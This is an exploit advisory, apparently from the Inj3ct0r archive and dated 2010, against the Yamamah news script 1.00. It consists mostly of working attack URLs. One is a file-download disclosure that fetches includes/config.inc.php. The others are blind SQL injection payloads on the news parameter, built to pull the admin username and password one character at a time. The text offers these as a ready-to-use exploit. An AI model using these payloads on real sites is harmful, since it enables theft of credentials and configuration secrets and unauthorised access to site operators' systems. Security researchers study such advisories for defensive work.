Yamamah Vulnerability (news) SQL Injection / disclosure Vuln
Posted on 09 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Yamamah Vulnerability (news) SQL Injection / disclosure Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Yamamah Vulnerability (news) SQL Injection / disclosure Vulnerability ===================================================================== # Exploit Title: Yamamah Mullti Vulnerability # Date: 9-06-2010 # Author: anT!-Tr0J4n # My Home : www.Dev-PoinT.com # Software Link:http://www.yamamah.org # Version: 1.00 # Tested on: Win7/Linux #DorK : N / A ========== Exploit By anT!-Tr0J4n============ =======Yamamah source code disclosure Vulnerability ============ [>] exploit -> http://localhsot/yamamah/index.php?download=(file name) http://server/[path]/index.php?download=includes/config.inc.php ====================================================== [>] Yamamah (news) Blind SQL Injection Vulnerability ====================================================== [>] exploit -> [>] (news) Blind SQL Injection [>] http://localhost/yamamah/?news=1[BSQLi] =================POC===================== http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1 http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1 ===============ABDO-R3ZK================== MY HomE : www.Dev-PoinT.com Author : anT!-Tr0J4n EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/ProfessionaL/Coffin Of Evil/HoBeeZ/ ABO-FaHED /Gonone Rash3d EL maged /mahmoudvip/ Mr.Mh$TEr / M [Zero] / R3d-D3v1l (ALL sEc-r1z crEw) /Cyber-Err0r/ saLman EL anz33 / FnooN =ABUO ShADEN /NASHY && And All My Frindes ===============ABDO-R3ZK================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>